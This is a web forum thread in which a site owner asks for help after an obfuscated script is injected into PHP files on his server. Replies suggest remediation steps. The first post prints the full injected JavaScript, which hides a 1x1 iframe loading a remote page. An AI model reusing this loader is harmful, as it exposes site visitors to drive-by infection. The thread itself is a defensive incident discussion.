|
Server comprimised, now what?
I am getting this script, attached to the end of my PHP scripts all over my server:
Code:
<script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);var tq=document.createElement(vu);tq.setAttribute('width','1');tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);document.body.appendChild(tq);</script>Now what??!!?!! 1) How can I find if the server is comprimised? 2) How can I find if it's a script on my server that is automatically adding it? 3) What to do?? JM Here is what I find on the net about that script: http://blog.unmaskparasites.com/2011...ction-k985ytv/ |
Your spelling skills have been compromised. Sorry, I couldn't resist.
|
sounds like you have a virus on your server, not that someone hacked it. had this happen a few years ago with a shitty host and had the same problem.
ask your host to run a virus scan or install some virus software. change all passwords, including root and disable SSH users (only 1 if you use it) and make sure if you have a way to upload files to one of your sites (i.e. videos) that you only allow certain formats and exclude .exe, etc, files. |
Contact your host.
|
You should be able to figure out that by yourself,i mean you are hardcore programmer so you should be more qualified then me for example :)Unless i mistaken you for someone else :)
|
btw also check your win pc/laptop where you have saved ftp/ssh access passwords for your server, problem might be there, not on the server.
happened to me few years ago. |
hosting company should be able to fix/remedy it
isprime is always on top of this for us, most companies are :thumbsup |
Who does your sys admin? You can hire someone if you have the budget for it.
|
Quote:
I changed all passwords, disabled most ssh access. I read it is a FTP stolen password problem, so perhaps changing passwords will fix. The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on... |
If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code)
Your host should be the first step in asking for help. Ask if any unusual IPs have accessed your account via FTP. They may also be able to check web server logs for suspicious activity. As the article you linked suggests, the problem may be related to your own computer, ie something running in the background and sniffing passwords. |
Quote:
|
The second half of this page will give you a general outline as to how to
secure you server - fixing stupid default PHP settings, getting rid of unused scripts, turning off suexec for sure, etc.: https://bettercgi.com/strongbox/pass...adyhacked.html Of course there have been 1,200 page books written on the topic, so that one page isn't comprehensive. You may need to talk to someone who has read the 1200 page books. If they can;t get it, talk to someone who has WRITTEN one of the 1200 page books. |
Quote:
I have updated all software, changed all passwords, no suexec, changed ports for ssh, turned off all default settings for apache / php / phpmyadmin. The server is at 67.21.112.158...please test if you can get in or there is something I should fix asap. Oops, first thing is to change the default welcome page. :-( |
Quote:
I'm a good php progammer, but a lousy admin. |
Quote:
|
Quote:
I think I will turn off proftp for a few hours and see if the script appears. This will confirm if its getting in through that. |
FTP? Yikes, don't use FTP. Remove any ftp daemon on the box and use SSH.
|
it probably isn't ftp. it is probably some out of date software on your machine with an sql injection or overflow that allows them to access your machine. check all software you use (like wordpress, phpmyadmin, or others) for more recent updates. check for files with 777 permissions, which is always a problem and check things like upload directories for .jpg.php files (which usually pass sanitizers).
|
there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
|
Are you a filezilla user by chance? This is something they're faced with more and more often.
|
Quote:
So the root SSH was not comprimised, nor were any accounts for friends that I am hosting. Suggesting, the problem was that machine was freely sending out passwords. All accounts changed, new machine has new virus software on it, server "appears" stable as of 10am... The good thing is that it appears my home machine was hacked, not the server itself. Also, I don't have any ability to FTP to any sites that are important. Only ssh on non-standard ports. I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called. |
quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didnt encrypt their upload.
|
Quote:
I would also suggest not using ftp anymore. sftp is so much better. Also would recommend against storing passwords anywhere. |
Quote:
This means the server, is infected with something. It seems this will be my project for tonight. Must eat dinner now, but will try to find it. Thoughts? |
|
| All times are GMT -7. The time now is 02:07 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123